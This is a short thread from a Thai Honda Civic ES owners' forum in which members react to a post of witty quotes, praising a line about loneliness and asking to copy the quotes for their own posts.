พุธ, 18 พฤษภาคม 2011 21:44 - คำคมโดนๆ เอามาฝากคับ
สวดยอด...
Manoi

ชื่อเล่น: หน่อย

เข้าร่วม: 15 พฤษภาคม 2011
ตอบ: 27

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 15

ปี: 2005
พุธ, 18 พฤษภาคม 2011 21:52 - คำคมโดนๆ เอามาฝากคับ
แต่เธอกินกับเขา เรียกว่า"เหงาแบบเพียวๆ"

อันนี้โดน!! ......เหงาแบบเพียวๆ เพราะมันเหงาเพียวได้ทุกเวลา
tonaff

ชื่อเล่น: เอ

เข้าร่วม: 26 ธันวา 2008
ตอบ: 673

Guru ES
Guru ES

ได้รับคำขอบคุณ: 721
ให้คำขอบคุณ: 1404

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 19 พฤษภาคม 2011 15:23 - คำคมโดนๆ เอามาฝากคับ
สุดๆค๊าบบบ
oat_es03

เข้าร่วม: 20 เมษา 2010
ตอบ: 514

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 502
ให้คำขอบคุณ: 498
พฤหัส, 19 พฤษภาคม 2011 15:58 - คำคมโดนๆ เอามาฝากคับ
ขอบคุณครับ....ขอก็อปเอาไปใช้ด้วยคนคร้าบบบบ
MADBOY

ชื่อเล่น: เบิร์ด

เข้าร่วม: 07 กันยา 2010
ตอบ: 1186

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 483
ให้คำขอบคุณ: 1235

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 19 พฤษภาคม 2011 16:13 - คำคมโดนๆ เอามาฝากคับ
ขอยืมไปโพสบ้างนะคับ
Atombome

เข้าร่วม: 29 สิงหา 2010
ตอบ: 37

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 34
ให้คำขอบคุณ: 5

พฤหัส, 19 พฤษภาคม 2011 23:18 - คำคมโดนๆ เอามาฝากคับ
คิดมาได้...javascript:switchEmo('3');
Atombome

เข้าร่วม: 29 สิงหา 2010
ตอบ: 37

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 34
ให้คำขอบคุณ: 5

พฤหัส, 19 พฤษภาคม 2011 23:20 - คำคมโดนๆ เอามาฝากคับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.